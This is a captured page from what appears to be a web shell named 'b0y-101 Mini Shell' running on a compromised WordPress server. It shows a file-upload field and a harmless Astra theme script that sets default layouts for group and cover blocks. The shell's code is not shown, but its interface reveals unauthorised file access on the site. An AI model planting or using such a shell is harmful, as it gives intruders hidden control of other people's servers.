b0y-101 Mini Shell


Current Path : E:/www/km/wp/wp-content/themes/astra/inc/assets/js/
File Upload :
Current File : E:/www/km/wp/wp-content/themes/astra/inc/assets/js/column-block-compatibility.js

const updatingBlock = ['core/group'];

wp.hooks.addFilter(
	'blocks.registerBlockType',
	'astra/meta/groupLayoutSettings',
	(settings, name) => {
		if (!updatingBlock.includes(name)) {
			return settings;
		}

		const newSettings = {
			...settings,
			supports: {
				...(settings.supports || {}),
				layout: {
					...(settings.supports.layout || {}),
					allowEditing: true,
					allowSwitching: false,
					allowInheriting: true,
				},
				__experimentalLayout: {
					...(settings.supports.__experimentalLayout || {}),
					allowEditing: true,
					allowSwitching: false,
					allowInheriting: true,
				},
			},
		};
		return newSettings;
	},
	20
);

wp.hooks.addFilter(
	'blocks.getBlockAttributes',
	'astra/groupBlockSetting/checkInheritOption',
	(attributes, blockType) => {
		if (!updatingBlock.includes(blockType.name)) {
			return attributes;
		}

		if (blockType.name == 'core/group' && undefined != attributes.layout && 'flex' === attributes.layout.type) {
			return attributes;
		}

		if (blockType.name == 'core/group' && undefined != attributes.layout && false == attributes.layout.inherit ) {
			return attributes;
		}

		attributes = {
			...attributes,
			layout: {
				inherit: true,
			},
		};

		return attributes;
	}
);

/**
 * Set "Inherit default layout" option enable by default for Group block.
 *
 * Also set "Full Width" layout by default on drag-drop for following blocks.
 */
wp.blocks.registerBlockVariation(
	'core/group',
	{
		isDefault: true,
		attributes: {
			layout: {
				inherit: true,
			},
			align: 'full'
		},
	}
);
wp.blocks.registerBlockVariation(
	'core/cover',
	{
		isDefault: true,
		attributes: {
			align: 'full'
		},
	}
);

Copyright © 2019 by b0y-101